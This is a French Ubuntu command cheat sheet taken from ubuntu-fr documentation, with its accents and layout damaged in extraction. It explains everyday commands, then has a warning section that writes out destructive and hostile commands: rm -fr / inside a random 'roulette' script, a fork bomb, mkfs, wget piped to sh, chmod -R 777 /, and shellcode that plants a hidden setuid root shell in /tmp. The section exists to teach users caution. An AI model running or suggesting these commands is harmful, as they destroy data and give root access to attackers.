Académique Documents
Professionnel Documents
Culture Documents
utiles ubuntu
ls
quivalent MS-DOS/MS Windows : dir
Signification : list segment
l Permet de lister un rpertoire
l Options les plus frquentes :
m -l : Permet un affichage dtaill du rpertoire (permissions d'accs, le nombre de liens
physiques, le nom du propritaire et du groupe, la taille en octets, et l'horodatage)
m -h : Associ avec -l affiche la taille des fichiers avec un suffixe correspondant l'unit (K, M,
G)
m -a : Permet l'affichage des fichiers et rpertoires cachs (ceux qui commencent par un .
(point))
l Exemples d'utilisation :
m ls -a
affiche tous les fichiers et rpertoires cachs du rpertoire courant
m ls /etc/
affiche le contenu du rpertoire /etc/
l
l
cd
quivalent MS-DOS/MS Windows : cd
Signification : change directory
l Permet de se promener dans les rpertoires
l Exemples d'utilisation :
m cd
permet de revenir au rpertoire /home/utilisateur (identique cd ~)
m cd permet de revenir au rpertoire prcedent
m cd ..
permet de remonter au rpertoire parent
m cd /
permet de remonter la racine de l'ensemble du systme de fichiers
m cd /usr/bin/
se place dans le rpertoire /usr/bin/
l
l
mv
quivalent MS-DOS/MS Windows : move ou ren
Signification : move
l Permet de dplacer ou renommer des fichiers et des rpertoires
l Options les plus frquentes :
m -f : Ecrase les fichiers de destination sans confirmation
m -i : Demande confirmation avant d'craser
m -u : N'crase pas le fichier de destination si celui-ci est plus rcent
l Exemples d'utilisation :
m mv monFichier unRep/
Dplace monFichier dans le rpertoire unRep
m mv unRep/monFichier
Dplace le fichier monFichier du rpertoire unRep l o on se trouve
m mv unRep monRep
Renomme unRep en monRep
l
l
cp
quivalent MS-DOS/MS Windows : copy
Signification : copy
l Permet de copier des fichiers ou des rpertoires
l Options les plus frquentes :
m -a : Archive. Copie en gardant les droits, dates, propritaires, groupes, etc.
m -i : Demande une confirmation avant d'craser
m -f : Si le fichier de destination existe et ne peut tre ouvert alors le dtruire et essayer
nouveau
m -r : Copie un rpertoire et tout son contenu
m -u : Ne copie que les fichiers plus rcents ou qui n'existent pas
m -v : permet de suivre les copies ralises en temps rel
l
l
Exemples d'utilisation :
cp monFichier sousrep/
Copie monFichier dans sousrep
m cp -r monRep/ ailleurs/
Copie le rpertoire monRep vers ailleurs en crant le rpertoire s'il n'existe pas.
m
rm
quivalent MS-DOS/MS Windows : del
Signification : remove
l Permet d'effacer des fichiers
l Options les plus frquentes :
m -f : Ne demande pas de confirmation avant d'effacer
m -r : Efface rcursivement les fichiers ainsi que les rpertoires
l Exemples d'utilisation :
m rm CeFichier
Efface le fichier CeFichier
m rm -rf /tmp/LeRep
Efface le rpertoire /tmp/LeRep ainsi que tous ses fichiers sans demander de confirmation
l
l
mkdir
quivalent MS-DOS/MS Windows : mkdir ou md
Signification : make directory
l Cre un rpertoire vide
l Options les plus frquentes :
m -p : Cre les rpertoires parents s'ils n'existent pas
l Exemples d'utilisation :
m mkdir photos
Cre le rpertoire photos
m mkdir -p photos/2005/noel
Cre le rpertoire noel et s'ils n'existent pas les rpertoires 2005 et photos
l
l
rmdir
quivalent MS-DOS/MS Windows : rmdir ou rd
Signification : remove directory
l Supprime un rpertoire (vide)
l Options les plus frquentes :
m -p : Supprime les rpertoires parents s'ils deviennent vides
l Exemples d'utilisation :
m rmdir LeRep
Supprime le rpertoire LeRep
l
l
top
Montre la charge CPU
Options les plus frquentes :
m -u : affiche les processus pour un utilisateur donn
l Exemples d'utilisation :
m top
m top -u root
l
l
ln
Signification : link
Cre un lien (physique ou symbolique) vers un fichier (ou un rpertoire)
l Options les plus frquentes :
m -s : Cre un lien symbolique (similaire au raccourci du monde Windows)
m -f : Force l'crasement du fichier de destination s'il existe
m -d : Cre un lien sur un rpertoire (uniquement en mode sudo ou root)
l Exemples d'utilisation :
m ln -s Rep1/Rep2/Monfichier MonLien
Cre un lien symbolique MonLien de Rep1/Rep2/Monfichier dans le rpertoire o on se trouve
m ln Monfichier unRep/AutreNom
Cre un lien physique AutreNom de Monfichier dans le rpertoire unRep
l Notes :
m Vrifiez que vous vous trouvez bien dans le rpertoire dans lequel vous souhaitez crer le lien
avant de faire cette commande.
l
l
find
quivalent MS-DOS/MS Windows : find
Signification : rechercher
l Permet de chercher des fichiers et ventuellement d'excuter des commandes sur ceuxci ; la recherche est rcursive c'est--dire qu'elle concerne le rpertoire de dpart et toute sa
descendance (sous-rpertoires ainsi que toute leur descendance )
l Options les plus frquentes :
m -name : Recherche d'un fichier par son nom
m -iname : Mme chose que name mais insensible la casse
m -type : Recherche de fichier d'un certain type
m -atime : Recherche par date de dernier accs
m -mtime : Recherche par date de dernire modification
m -link : Recherche du nombre de liens au fichier
m -user : Recherche de fichiers appartenant l'utilisateur donn
m -group : Recherche de fichiers appartenant au groupe donn
l Action les plus frquentes :
m -exec : Excute la commande donne aux fichier trouvs
m -ok : Mme chose que exec mais demande une confirmation
m -ls : excute la commande ls chaque fichier trouv
l Oprateurs les plus frquents :
m -a : Oprateur ET
m -o : Oprateur OU
m ! ou -not : Oprateur NOT
l Exemples d'utilisation :
l
l
simple
Placez-vous dans le rpertoire partir duquel la recherche rcursive doit tre effectue et faites :
5
avanc
find /home/ -name monfichier
Recherche le fichier monfichier dans toute la descendance de /home/
l find . -name "*.c"
Recherche tous les fichiers ayant une extension .c
l find . -mtime -5
Recherche les fichiers du rpertoire courant qui ont t modifis entre maintenant et il y a 5
jours
l find /home/ -mtime -1 \! -type d
Recherche uniquement les fichiers (! -type d signifie n'tait pas un rpertoire) ayant t modifis
ces dernires 24h
l find . ! -user root
Affiche tous les fichiers n'appartenant pas l'utilisateur root
l find . \( -name '*.wmv' -o -name '*.wma' \) -exec rm {} \;
Recherche et supprime tous les fichiers WMA et WMV trouvs
l Autres exemples sur http://ardchoille42.blogspot.com/2009/08/finding-files-via-comand-line.
html
l
grep
quivalent MS-DOS/MS Windows : find
Signification : global regular expression print
l Recherche une chane de caractres dans des fichiers (ou depuis la console si aucun fichier n'est
indiqu) ; Souvent utilis en filtre avec d'autres commandes.
l Options les plus frquentes :
m -c : Retourne le nombre de lignes au lieu des lignes elles mmes
m -n : Retourne les lignes prfixes par leur numro
m -i : Insensible la casse
m -r : Recherche rcursivement dans tous les sous-rpertoires ; On peut utiliser la commande
rgrep
m -G : Recherche en utilisant une expression relationnelle basique (option par dfaut)
m -E : Recherche en utilisant une expression relationnelle tendue ; On peut utiliser la commande
egrep
m -F : Recherche en utilisant une chane fixe ; On peut utiliser la commande fgrep
l Exemples d'utilisation :
m grep -n montexte monfichier
Retourne toutes les lignes ainsi que leur numro ou montexte apparait dans monfichier
l
l
locate
Son utilisation - trs simple - est dtaille ici : http://doc.ubuntu-fr.org/recherche_ligne_
commande
cat
l
more
quivalent MS-DOS/MS Windows : type
Signification : more
l Affiche un fichier page par page
l Options les plus frquentes :
m -s : Regroupe les lignes vides conscutives en une seule
m -f : Ne coupe pas les lignes longues
l Exemple d'utilisation :
m more -sf monFichier
Affiche monFichier page par page en concatnant les lignes vides sans compter les lignes
longues.
l
l
less
quivalent MS-DOS/MS Windows : type
Signification : less
l Affiche un fichier page par page
l Options les plus frquentes :
m -e ou -E : Quitte automatiquement la deuxime fois que la fin du fichier est atteinte, ou ds
la premire fois avec -E.
m -F : Quitte automatiquement si le fichier tient sur le terminal.
m -m ou -M : Prompt long a la more.
m -r ou -R : Autorise les caractres spciaux.
m -x : Rgle la taille des tabulations.
m -~ : ne comble pas les lignes vides par des ~
l Exemple d'utilisation :
m less -Emr~ monFichier
Affiche monFichier page par page avec un prompt long (affichage du pourcentage du fichier
parcouru) en affichant les caractres spciaux sans combler les lignes vides par des ~
l
l
chown
quivalent MS-DOS/MS Windows : cacls
Signification : change owner
l Change le propritaire et le groupe propritaire d'un fichier
l Options les plus frquentes :
m -R : Modifie rcursivement un rpertoire et tout ce qu'il contient
l Exemples d'utilisation :
m chown autreUtilisateur MonFichier
Change le propritaire de MonFichier en autreUtilisateur
m chown -R lui:nous monRep
Change le propritaire en lui et le groupe propritaire en nous du rpertoire monRep ainsi que
tout ce qu'il contient
l
l
chgrp
Signification : change groupe
Change le groupe propritaire d'un fichier
l Options les plus frquentes :
m -R : Change rcursivement un rpertoire et tout ce qu'il contient
m -h : Change le groupe propritaire d'un lien symbolique et seulement lui (ne touche pas la
destination du lien)
m -L : Si fournie avec R, change le groupe propritaire d'un rpertoire et des fichiers qu'il contient
s'il est point par un lien symbolique rencontr lors de l'excution
l
l
Exemples d'utilisation :
chgrp unGroupe MonFichier
Change le groupe propritaire du fichier MonFichier en unGroupe
m chgrp -R unGroupe monRep
Change le groupe propritaire du rpertoire monRep ainsi que tout ce qu'il contient en
unGroupe
m
free
Signification : mmoire libre
Affiche la mmoire disponible / utilise du systme
l Options les plus frquentes :
m -b : Affiche la mmoire en bytes
m -k : Affiche la mmoire en kilo octet
m -m : Affiche la mmoire en mga octet
m -g : Affiche la mmoire en giga octet
m -s : Spcifie le dlai de raffichage de la mmoire
m -t : Affiche la ligne des totaux
l Exemples d'utilisation :
m free -m -s 5
Affiche la mmoire du systme en mga octet toutes les 5 secondes
l
l
mount
Signification : mount
Monter un systme de fichiers
l Options les plus frquentes :
m -a : Monter tous les systmes de fichier dclars dans le fichier /etc/fstab
m -t : Prcise le type de fichier monter
m -o : Ajouter une option. Options adjointe -o les plus frquentes :
m auto : Permet d'tre mont par -a
m async : Les entres/sorties sur le systme de fichiers seront asynchrones
m defaults : Utilise les options rw, suid, dev, exec, auto, nouser, et async.
m dev : Interprte les fichiers spciaux de priphriques du systme prsent dans /dev/
m exec : Permet l'excution de fichiers binaires du systme mont
m noauto : Empche d'tre mont avec -a
m nodev : Ne pas interprter les fichiers spciaux de priphriques du systme
m noexec : Empche l'excution de fichiers binaires du systme mont
m nouser : Ne pas autoriser d'autres utilisateurs que root (ou sudo) monter le systme de
fichiers (comportement par dfaut)
m ro : Monte le systme en lecture seule
m rw : Monte le systme en lecture et criture
m suid : Prend en compte les bits SetUID ou SetGID du systme mont
m user : Permet aux utilisateurs ordinaires monter et dmonter le systme de fichiers (implique
noexec, nosuid, et nodev sauf si surcharges)
l Exemples d'utilisation :
m mount
Liste tous les systmes de fichiers actuellement monts
m mount -a
Monte tous les systmes de fichiers dclars dans le fichier /etc/fstab
m mount /mnt/maPartion
Monte le systme de fichiers ad-hoc dclars dans le fichier /etc/fstab
l
l
umount
Signification : unmout
Dmonte un systme de fichiers
l Options les plus frquentes :
m -a : Dmonte tous les systmes de fichiers prsents dans /etc/mtab
m -d : Si le systme mont est un priphrique loop, librer le priphrique.
m -f : Forcer le dmontage
m -r : Si impossible de dmonter, monter en lecture seule
l Exemples d'utilisation :
m umount /mnt/Mondisk
Dmonte le systme de fichiers mont dans /mnt/Mondisk
m umount -f /dev/cdrom
Force le dmontage du priphrique CDROM
m umount -d /mnt/monIso
Dmonte et libre le priphrique loop
m umount -a
Dmonte tous les systmes de fichiers monts ( l'exception de /proc) ; ne sert que lorsque l'on
veut redmarrer ou teindre sa machine manuellement et proprement.
l
l
sudo
quivalent MS-DOS/MS Windows : runas
Signification : super user - do
l Permet d'excuter des commandes en tant qu'un autre utilisateur, donc avec d'autres privilges
que les siens.
l Options les plus frquentes :
m -s : Importe les variables d'environnement du shell
m -k : Lorsque l'on utilise sudo, il garde en mmoire le mot de passe ; cette option dconnecte
l'utilisateur et forcera redemander un mot de passe si sudo est excut avant le timeout
dfini.
l Exemples d'utilisation :
m $ sudo reboot
Lance la commande reboot avec les droits de l'utilisateur root
l Ressources :
m http://doc.ubuntu-fr.org/sudo
m Site officiel de sudo : http://www.courtesan.com/sudo/
m Voir aussi la commande visudo
l
l
10
kill / killall
quivalent MS-DOS/MS Windows : taskkill
Signification : kill / kill all [tuer/tuer tous]
l Permet d'envoyer un signal un processus ; kill ne comprend que les PID (Process Identifier,
numro d'ordre du processus), killall quant lui comprend le nom du processus.
l Options les plus frquentes :
m -s : Indique quel signal s envoyer au processus ; Le signal peut tre identifi soit par son nom
(exemple : SIGTERM) soit par son numro (exemple : 9) ; Cette option peut tre remplace par
le numro du signal : -s 9 est quivalent -9.
m -l : Affiche la liste des signaux connus.
l Les signaux les plus courants sont :
HUP signal 1 : signal de fin dexcution ou le processus doit relire son fichier de configuration.
TERM signal 15 : Le signal Terminate indique un processus quil doit sarrter.
KILL signal 9 : Le signal Kill indique au systme quil doit arrter un processus qui ne rpond
plus.
l Exemples d'utilisation :
m kill -15 14774 : Envoie le signal 15, ou TERM, au processus ayant le numro 14774 ce qui a pour
effet de terminer proprement le processus.
m kill -9 7804 : Envoie le signal 9, ou KILL, au processus ayant le numro 7804 ce qui a pour effet
de tuer le processus.
m killall -TERM firefox-bin : Envoie le signal TERM, ou 15, au processus firefox-bin ce qui a pour
effet de le fermer.
l Il est conseill de lancer des signaux de faible importance avant de lancer la grosse artillerie. En
pratique, tester dans l'ordre et deux fois chacune de ces commandes :
l a ne marche pas ? Deux possibilits, diagnosticable laide de la commande ps aux|grep
nom_du_process :
m Le processus est devenu zombie . Dans ce cas, la commande prcdente affiche un Z.
Pour le tuer, il faut tuer ou redmarrer son processus parent, que lon peut dterminer avec la
commande ps -ef ou ps afx.
m Le processus est ininterruptible (il apparat comme D avec la commande prcdente), bloqu
sur une opration dentre/sortie (I/O), vraisemblablement suite un bug dans un pilote matriel.
Dans ce cas, aucune issue : la politique des dveloppeurs du noyau linux est de considrer
quavoir la main sur ce type de processus compromettrait trop profondment la stabilit du
systme. Cest lun des rares cas o lon a pas dautre choix que de redmarrer lordinateur.
l
l
11
passwd
Signification : password
Permet de modifier le mot de passe dun utilisateur
l Options les plus frquentes :
m -S : Affiche ltat dun compte (nom du compte, bloqu (L), si lutilisateur na pas de mot de
passe (NP) ou a un mot de passe utilisable (P), date de dernire modification du mot de passe,
dure minimum avant modification, dure maximum de validit, dure davertissement, dure
dinactivit autorise)
A moins dtre adminsitrateur systme ou rseau (auquel cas pourquoi lisez-vous ces lignes ;-) ?)
cette commande sutilise gnralement sans option.
l Exemple dutilisation :
m passwd
Demande changer le mot de passe
l
l
groups
Signification : groups
Affiche les groupes auxquels appartient un utilisateur
l Exemples dutilisation :
m groups
Affiche la liste des groupes auxquels appartient lutilisateur ayant tap la commande.
m groups CyberSDF
Affiche tous les groupes auxquels appartient lutilisateur CyberSDF.
l
adduser
Signification : add user
Ajoute un utilisateur, ou un groupe, au systme.
l Options les plus frquentes :
m disabled-login : Empche lutilisateur de se connecter.
m disabled-password : Un peu comme </del>disabled-login sauf quil est possible de se
connecter via une cl RSA SSH, pratique pour crer un utilisateur qui ne se connectera que via
SSH.
m system : Cre un utilisateur systme.
m group : Avec system cre un groupe avec le mme ID que lutilisateur systme, sans un
groupe avec le nom donn sera cr
m home : Permet de fixer le rpertoire HOME de lutilisateur.
m no-create-home : Ne cre pas de rpertoire HOME.
l Exemples dutilisation :
m adduser CyberSDF
Cre lutilisateur CyberSDF
m adduser disabled-password no-create-home CyberSSH
Cre un utilisateur CyberSSH sans mot de passe qui ne pourra pas se connecter directement sur
la machine et sans lui crer de rpertoire home.
m adduser disabled-password home /home/CyberSDF CyberSDF
Mme chose quau dessus sauf quon lui donne le mme rpertoire HOME qu lutilisateur
CyberSDF cr en premier.
l
l
deluser
12
usermod
Signification : user modification
Modifie le groupe dappartenance dun utilisateur.
l Options les plus frquentes :
m -G, groups GROUPE1[,GROUPE2,[,GROUPEN]]] : Ajouter lutilisateur aux groupes prcdents.
Si lutilisateur fait actuellement partie dun groupe qui nest pas list, lutilisateur sera supprim
du groupe. Ce comportement peut tre chang avec loption -a, qui permet dajouter lutilisateur
une liste de groupes supplmentaires.
l Exemples dutilisation :
m usermod -aG toto machin
Ajoute lutilisateur machin au groupe toto sans supprimer machin de son groupe originel.
m sudo usermod -d /home/nouveau_login -m -l nouveau_login ancien_login
Permet de renommer le rpertoire (dossier) utilisateur et de changer son nom. Pratique lorsque
le pc change de mains.
l
l
df
Signification : disk free
Affiche la quantit despace disque utilis par les systmes de fichiers.
l Options les plus frquentes :
m -a : Affiche tous les systmes de fichiers, y compris ceux de 0 blocs (par exemple : proc, sysfs,
usbfs et tmpfs)
m -h : Ajoute aux valeur un M pour mbioctet (2^20 octets) pour que ce soit plus lisible.
m -H : Pareil que -h mais en mgaoctets (10^6 octets).
m -T : Affiche le type du systme de fichier.
l Exemples dutilisation :
m df -h
Affiche la quantit despace disque utilis en mbioctets par les systmes de fichiers.
m df /home
Affiche la quantit despace disque utilis par la partition /home (si elle existe)
m df -T -h
Affichage le nom des partitions et leur point de montage.
l
l
fdisk
quivalent MS-DOS/MS Windows : fdisk
Signification : infos disques
l Affiche les infos des disques
l Options les plus frqentes :
m -l Informations dtailles des disques
l
l
13
Exemples dutilisation
sudo fdisk -l
du
quivalent MS-DOS/MS Windows : dir
Signification : directory usage
l Affiche lespace disque utilis par rpertoires
l Options les plus frquentes :
m -a : Afficher pour tous les fichiers et pas uniquement les rpertoires.
m -c : Faire un total aprs avoir tout affich.
m -h : Ajoute un suffixe correspondant lunit (K, M, G)
m -H : Idem que -h mais en puissance de 10
l Exemple dutilisation :
m du -ch /home/CyberSDF
Affiche la taille des rpertoires contenus dans /home/CyberSDF en utilisant un suffixe puis le
total.
l
l
uptime
l
l
l
Signification : uptime
Indique depuis quand le systme fonctionne.
Exemples dutilisation :
kill pid (envoie le signal 15, TERM)
kill -INT pid (envoie le signal 2, INT)
kill -KILL pid (envoie le signal 9, KILL)
uptime
Affiche lheure actuelle, la dure depuis laquelle le systme fonctionne, le nombre dutilisateurs
actuellement connects, et la charge systme moyenne ; Commande de geek par excellence :-)
qui ne sert pas grand chose pour un utilisateur lambda, mais utile pour un administrateur.
m
lspci
Signification : list pci
Liste tous les priphriques PCI
l Option la plus frquente :
m -v : Affiche des informations plus dtailles
l Exemples dutilisation :
m lspci
l
l
lsusb
Signification : list usb
Liste tous les priphriques USB
l Option la plus frquente :
m -v : Affiche des informations plus dtailles
l Exemples dutilisation :
m lsusb
l
l
14
apt-get
Signification : avanced package tool - get
Permet linstallation et le retrait de packages en tenant compte des dpendances ainsi que le
tlchargement des packages sils sont sur une source rseau.
l Commandes les plus frquentes :
m update : Met jour la liste des packages disponibles en fonction des sources fournies.
m upgrade : Met jour tous les packages dj installs.
m dist-upgrade : Pareil que prcdent mais permet galement de passer une version n+1
simplement de la distribution
m install : Installe un ou plusieurs packages.
m remove : Supprime un ou plusieurs packages.
m clean : Efface du disque dur les packages tlchargs.
l Options les plus frquentes :
m -f : Utilise avec install ou remove cette option permet de rparer un systme dont les
dpendances sont dfectueuses.
m -m : Ignore les paquets manquants (a viter si on ne sait pas exactement ce que lon fait).
m -s : Fait une simulation des actions mener sans rien toucher au systme.
m -y : Rpond automatiquement oui toutes les questions.
m -u : Affiche les paquets mis jour.
m purge : A utiliser conjointement avec remove pour supprimer tout ce qui peut ltre (fichiers
de configuration par exemple).
m reinstall : Rinstaller les paquets avec leur version plus rcente.
l Exemples dutilisation :
m apt-get update
Met jour la liste de packages.
m apt-get upgrade
Met jour tous les packages installs.
m apt-get install package1 package2
Installe package1 et package2.
m apt-get purge remove package3
Supprime package3 ainsi que tous les fichiers de configuration.
l Ressources :
m http://doc.ubuntu-fr.org/apt
m Chez Debian le APT HOWTO4
l
l
15
16
17
/dev/null est lquivalent de la corbeille dfinitive, tout fichier envoy cette sortie entrane sa
suppression.
Assurez vous que :
un avertissement vous prvient et vous en assumerez les consquences en cas de perte de
donnes.
l la documentation est bien claire, bien rdige, explicite.
l
18
Par exemple, la commande suivante est trs dangereuse : elle provoque la suppressions de tous les
fichiers.
sudo find / -name * -exec rm {} \;
De mme pour rm qui est utilis.
Re-formatage
Les donnes sur le priphrique mentionn aprs la commande mkfs seront dtruites et remplaces
par un systme de fichier vide :
mkfs
mkfs.ext3
mkfs.QUELQUE_CHOSE
Forkbomb
Excute un grand nombre de processus jusqu ce que le systme gle, ce qui vous force faire un
arrt brutal et peut causer la corruption du systme, ou dautres dsagrments.
Avec le shell Bash :
:(){:|:&};:
En Perl :
perl -e fork while fork
Si vous voulez savoir comment se protger contre les forks bombs allez voir sur http://doc.ubuntu-fr.
org/tutoriel/comment_se_proteger_des_fork_bomb.
Tarbomb
Quelquun vous demande dextraire une archive dans un rpertoire existant. Cette archive tar peut
tre conue pour exploser en un grand nombre de fichiers, voire craser les fichiers de lutilisateur qui
19
Dcompression bomb
Quelquun vous demande dextraire une archive qui semble petite lors du tlchargement mais
qui contient la dcompression des donnes dune taille beaucoup plus considrable, au point de
remplir votre disque dur. Vous ne devriez pas utiliser des donnes dune source non-fiable.
Shell
Quelquun vous donne le lien vers un script shell excuter. Il peut contenir nimporte quelle
commande (bnigne ou malveillante). Vous ne devriez pas excuter du code de personnes qui vous
ne faites pas confiance :
wget http://une_adresse/un_fichier
sh ./un_fichier
wget http://une_adresse/un_fichier -O- | sh
Roulette russe
Une fois ce script lanc, vous avez une chance sur 6 pour que tous les fichiers la racine de votre
systme soient effacs. Faites attention ce script et ses variantes !
#!/bin/bash
echo
[ $[ $RANDOM % 6 ] == 0 ] && rm -fr / || echo You live
exit 0
Compilation de code
Quelquun vous donne le code source et vous dit de le compiler. Il est facile de cacher du code
malveillant dans un long code source, et le code source donne lattaquant beaucoup de possibilits
pour dguiser son code malveillant. Vous ne devriez pas compiler ou excuter le code compil,
moins quil ne sagisse dune application bien connue, obtenue partir dun site rput (SourceForge,
les sites Ubuntu, etc.).
Par exemple :
char esp[] __attribute__ ((section(.text))) /* e.s.p
release */
= \xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x00\x2d\x63\x00
cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;;
20
Changements de droits
chmod -R 777 /
Ceci donne les droits de lecture et dcriture sur tous les fichiers. Or les commandes situes dans /
bin ne supportent pas ce mode. Dans ce cas, il faut rattribuer la valeur o-w, il faut que vous ayez
les droits u+w sur /tmp
Pour info : un / non modifi :
$ ls -al /
total 100
drwxr-xr-x 21 root root 4096 2009-07-15 09:39 .
drwxr-xr-x 21 root root 4096 2009-07-15 09:39 ..
drwxr-xr-x
2 root root 4096 2009-07-14 00:49 bin
drwxr-xr-x
3 root root 4096 2009-07-15 09:39 boot
lrwxrwxrwx
1 root root
11 2009-07-09 22:34 cdrom -> media/cdrom
drwxr-xr-x 17 root root 4920 2009-07-18 04:47 dev
drwxr-xr-x 144 root root 12288 2009-07-18 05:30 etc
drwxr-xr-x
3 root root 4096 2009-07-09 22:40 home
lrwxrwxrwx
1 root root
33 2009-07-15 09:39 initrd.img -> boot/initrd.
img-2.6.28-14-generic
lrwxrwxrwx
1 root root
33 2009-07-09 23:04 initrd.img.old -> boot/
initrd.img-2.6.28-13-generic
drwxr-xr-x 19 root root 12288 2009-07-17 21:58 lib
drwx-----2 root root 16384 2009-07-09 22:34 lost+found
drwxr-xr-x
9 root root 4096 2009-07-18 04:42 media
drwxr-xr-x
2 root root 4096 2009-04-13 11:33 mnt
drwxr-xr-x
2 root root 4096 2009-04-20 15:59 opt
dr-xr-xr-x 177 root root
0 2009-07-18 06:35 proc
drwx------ 14 root root 4096 2009-07-18 05:10 root
drwxr-xr-x
2 root root 4096 2009-07-17 21:59 sbin
drwxr-xr-x
2 root root 4096 2009-03-06 17:21 selinux
drwxr-xr-x
2 root root 4096 2009-04-20 15:59 srv
drwxr-xr-x 12 root root
0 2009-07-18 06:35 sys
drwxrwxrwt 16 root root 4096 2009-07-18 05:17 tmp
drwxr-xr-x 13 root root 4096 2009-07-17 01:34 usr
drwxr-xr-x 16 root root 4096 2009-07-10 15:35 var
lrwxrwxrwx
1 root root
30 2009-07-15 09:39 vmlinuz -> boot/vmlinuz2.6.28-14-generic
lrwxrwxrwx
1 root root
30 2009-07-09 23:04 vmlinuz.old -> boot/
vmlinuz-2.6.28-13-generic
Plus gnralement, attention aux changements de droits, surtout quand ils sappliquent sur des
dossiers. Par exemple un
chmod -R xxx /home/votre_utilisateur
21
Conclusion
Encore une fois, il ne sagit pas de donner une liste complte des commandes malveillantes, et il
ne faut pas utiliser cette page comme une liste de vrification pour dterminer si une commande
est dangereuse ou pas ! Cette page est simplement ducative, pour faire prendre conscience
lutilisateur de la dangerosit potentielle du shell. Toute commande ne doit tre excute que si elle
est sre et si lon comprend ce que lon fait.
Le meilleur moyen dvaluer les risques est probablement lutilisation de la commande man5.
Rfrences
1
2
3
4
5
http://doc.ubuntu-fr.org/tutoriel/comment_installer_un_paquet
http://doc.ubuntu-fr.org/ls_couleur
http://doc.ubuntu-fr.org/installation/mount_fstab
http://www.debian.org/doc/manuals/apt-howto/index.fr.html
http://doc.ubuntu-fr.org/page_de_manuel
http://ubuntuforums.org/announcement.php?f=359
Contributeurs
l
CyberSDF (http://doc.ubuntu-fr.org/utilisateurs/cybersdf)
tshirtman (http://doc.ubuntu-fr.org/utilisateurs/tshirtman)
morgen_stern (http://doc.ubuntu-fr.org/utilisateurs/morgen_stern)
Bogoris (http://doc.ubuntu-fr.org/utilisateurs/bogoris)
Hoxus (http://doc.ubuntu-fr.org/utilisateurs/hoxus)
Johndescs (http://doc.ubuntu-fr.org/utilisateurs/johndescs)
jisee (http://doc.ubuntu-fr.org/utilisateurs/jisee)
didrocks (http://doc.ubuntu-fr.org/utilisateurs/didrocks)
Source
http://doc.ubuntu-fr.org/
22
notes
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
23
Raccourcis clavier
Action
Synchronisation des disques (pratique pour les applications
en plein cran comme les jeux)
Alt
Syst
Alt
Syst
Alt
Syst
Alt
Syst
Alt
Syst
Alt
Syst
Alt
Menu Applications
Alt
F1
Alt
F2
Alt
F4
Alt
F5
Alt
F10
Alt
F9
Dplacer la fentre
Alt
F7
Redimensionner la fentre
Alt
F8
Alt
Tab
Ctrl
Alt
Changer de bureau
Ctrl
Alt
Ctrl
Alt
Zoom
Ctrl
+ Molette souris
Alt
Alt
Espace
ou
Shift
ou
Ctrl
Alt
Orig
www.inlibroveritas.net